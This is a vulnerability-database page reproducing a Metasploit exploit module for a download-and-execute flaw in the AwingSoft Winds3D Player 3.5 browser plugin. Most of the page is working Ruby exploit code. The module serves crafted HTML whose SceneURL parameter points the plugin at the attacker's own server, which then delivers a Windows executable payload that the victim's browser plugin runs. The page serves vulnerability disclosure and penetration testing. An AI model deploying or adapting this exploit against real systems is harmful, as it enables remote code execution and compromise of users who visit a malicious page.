Lucene search

K

AwingSoft Winds3D Player 3.5 SceneURL Download and Execute

🗓️ 31 Dec 2009 00:00:00Reported by jduckType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

Winds3D Player 3.5 untrusted program execution vulnerability in browser plugin

Show more
Code
`##  
# $Id: awingsoft_winds3d_sceneurl.rb 7724 2009-12-06 05:50:37Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',  
'Description' => %q{  
This module exploits an untrusted program execution vulnerability within the  
Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for  
IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'   
parameter to the URL to an executable, an attacker can execute arbitrary   
code.  
  
Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and  
IE 8 on Windows XP SP3.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'jduck'  
],  
'Version' => '$Revision: 7724 $',  
'References' =>  
[  
[ 'OSVDB', '60049' ]  
],  
'Payload' =>  
{  
'Space' => 2048,  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { }],  
],  
# 'DisclosureDate' => 'Mmm DD 2009',  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
  
payload_url = "http://"  
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']  
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"  
  
if (request.uri.match(/payload/))  
return if ((p = regenerate_payload(cli)) == nil)  
data = Msf::Util::EXE.to_win32pe(framework,p.encoded)  
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")  
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })  
  
# Handle the payload  
# handler(cli)  
return  
end  
  
# otherwise, send the html..  
html = %Q|<html>  
<body>  
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'   
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>  
<param name="SceneURL" value="#{payload_url}#">  
<embed type="application/x-awingsoft-winds3d" src="#{payload_url}">  
</object>  
|  
  
print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")  
# Transmit the compressed response to the client  
send_response(cli, html, { 'Content-Type' => 'text/html' })  
  
end  
end  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo